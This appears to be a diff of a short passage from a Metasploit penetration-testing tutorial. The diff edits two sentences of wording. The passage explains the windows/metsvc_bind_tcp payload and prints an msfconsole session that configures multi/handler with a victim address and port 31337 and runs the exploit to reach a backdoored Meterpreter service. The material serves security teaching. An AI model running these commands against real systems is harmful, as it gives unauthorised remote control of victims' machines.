 We will now use the multi/handler with a payload of ‘windows/metsvc_bind_tcp’ to connect to the remote system.
-This is a special payload, as typically a Meterpreter payload is multistage, where a minimal amount of code is sent as part of the exploit, and then more is uploaded after code execution has been accomplished.
+This is a special payload, as typically a Meterpreter payload is multi-stage, where a minimal amount of code is sent as part of the exploit, and then more is uploaded after code execution has been achieved.

 We set all of our options for ‘metsvc_bind_tcp’ with the victim’s IP address and the port we wish to have the service connect to on our machine.
 We then run the exploit.

 msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set RHOST 192.168.1.104 RHOST => 192.168.1.104 msf exploit(handler) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/metsvc_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 31337 yes The local port RHOST 192.168.1.104 no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit